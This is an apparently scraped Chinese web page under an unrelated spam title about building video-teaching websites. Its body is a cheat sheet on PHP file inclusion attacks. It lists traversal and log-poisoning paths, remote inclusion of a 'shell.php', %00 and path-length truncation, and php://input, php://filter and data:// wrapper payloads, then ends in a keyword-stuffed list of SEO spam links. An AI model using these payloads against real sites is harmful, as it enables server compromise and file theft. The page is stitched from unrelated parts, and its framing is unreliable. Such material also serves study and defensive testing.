当前位置: 首页 > news >正文

建设一个视频教学网站交易平台网站建设策划书

建设一个视频教学网站,交易平台网站建设策划书,网站建设所需费用,wordpress站点的临时域名本地文件包含 常见的文件包含漏洞的形式为 <?php include("inc/" . $_GET[file]); ?> 考虑常用的几种包含方式为 同目录包含file.htaccess目录遍历?file…/…/…/…/…/…/…/…/…/var/lib/locate.db日志注入?file…/…/…/…/…/…/…/…/…/var/log/a…

本地文件包含

常见的文件包含漏洞的形式为 <?php include("inc/" . $_GET['file']); ?> 考虑常用的几种包含方式为

  • 同目录包含file=.htaccess
  • 目录遍历?file=…/…/…/…/…/…/…/…/…/var/lib/locate.db
  • 日志注入?file=…/…/…/…/…/…/…/…/…/var/log/apache/error.log
  • 利用/proc/self/environ

其中日志可以使用SSH日志或者Web日志等多种日志来源测试

远程文件包含

  • 利用条件
  • ini中allow_url_fopen=On(默认开启)和allow_url_include=On(默认关闭,需要打开)开启
  • 用户参数可控
  • 后台对文件包含没有过滤
  • 利用方式
  • ?filename=http://xx.xx.xx.xx/shell.php
  • ?filename=http://xx.xx.xx.xx/shell.php?code=phpinfo();

触发Sink编辑

如 PHP中:

include

在包含过程中出错会报错,不影响执行后续语句

include_once

仅包含一次

require

在包含过程中出错,就会直接退出,不执行后续语句

require_once

绕过技巧编辑

常见的应用在文件包含之前,可能会调用函数对其进行判断,一般有如下几种绕过方式

url编码绕过

如果WAF中是字符串匹配,可以使用url多次编码的方式可以绕过

特殊字符绕过

  • 某些情况下,读文件支持使用Shell通配符,如 ?* 等
  • url中 使用 ?# 可能会影响include包含的结果
  • 某些情况下,unicode编码不同但是字形相近的字符有同一个效果

%00截断

几乎是最常用的方法,条件是 magic_quotes_gpc 关闭,而且php版本小于5.3.4。

长度截断

Windows上的文件名长度和文件路径有关。具体关系为:从根目录计算,文件路径长度最长为259个bytes。 msdn定义 #define MAX_PATH 260,其中第260个字符为字符串结尾的 \0 ,而linux可以用getconf来判断文件名长度限制和文件路径长度限制。 获取最长文件路径长度:getconf PATH_MAX /root 得到4096 获取最长文件名:getconf NAME_MAX /root 得到255 那么在长度有限的时候,././././ (n个) 的形式就可以通过这个把路径爆掉 在php代码包含中,这种绕过方式要求php版本 < php 5.2.8

伪协议绕过

  • 远程包含: 要求 allow_url_fopen=On且 allow_url_include=On , payload为 ?file=[http|https|ftp]😕/websec.wordpress.com/shell.txt 的形式
  • PHP input: 把payload放在POST参数中作为包含的文件,要求 allow_url_include=On,payload为 ?file=php://input 的形式
  • Base64: 使用Base64伪协议读取文件,payload为 ?file=php://filter/convert.base64-encode/resource=index.php的形式
  • data: 使用data伪协议读取文件,payload为 ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=的形式,要求 allow_url_include=On

协议绕过

allow_url_fopen 和 allow_url_include 主要是针对 http ftp 两种协议起作用,因此可以使用SMB、WebDav协议等方式来绕过限制。

http://www.yayakq.cn/news/494374/

相关文章:

  • 顶呱呱做网站吗加强制度建设 信息公开 网站 专栏
  • 建设厅官方网站广州番禺区邮政编码
  • 网站seo关键词排名网站设计的实例
  • 电商网站建设精准扶贫的目的页面设计设计风格
  • 网站建设ui东莞网站建设_东莞网页设计
  • 免费自己怎么注册网站亚马逊被曝将裁员1万人
  • 房地产微网站绿色科技网站建设
  • 个人网站创建深圳百度seo怎么做
  • 沈阳中天建设集团网站南宁中庭装饰公司电话
  • 多新闻怎么做扁平网站网站开发保密协议书
  • 网站结构的规划与设计淘宝客网站哪里可以做
  • 中国建设银行的网站.广州网页设计公司
  • 地方建立网站做SEM有机玻璃东莞网站建设技术支持
  • 网站建设维护更新美团网站怎么做
  • 怎样创建旅游网站蜘蛛不抓取网站的原因
  • 完整企业网站模板有四川建设人才网这个网站吗
  • 电子 东莞网站建设建设厅网站如何查询企业信息
  • 青岛网页建站工具中国十大公司
  • 合肥seo代理商上海百度搜索排名优化
  • jsp做新闻系统门户网站flash优秀网站
  • 网站后台怎么不能上传图片网站开发指什么软件
  • 做网站开发需要学那些东西莱芜二中网站
  • 网站配色 要用什么原则wordpress页面内容设计
  • 做分销的官网网站合肥seo快排扣费
  • 阿里巴巴上怎样做自己的网站台州英文网站建设
  • 开淘宝的店铺网站怎么做中企动力主要是干嘛的
  • 广州做韩国网站content index for wordpress
  • 免费发帖推广网站锡盟建设工程网站
  • iis 多网站安全设置佛山搜索引擎优化
  • 个体营业执照可以做网站搞推广吗修改wordpress标题图片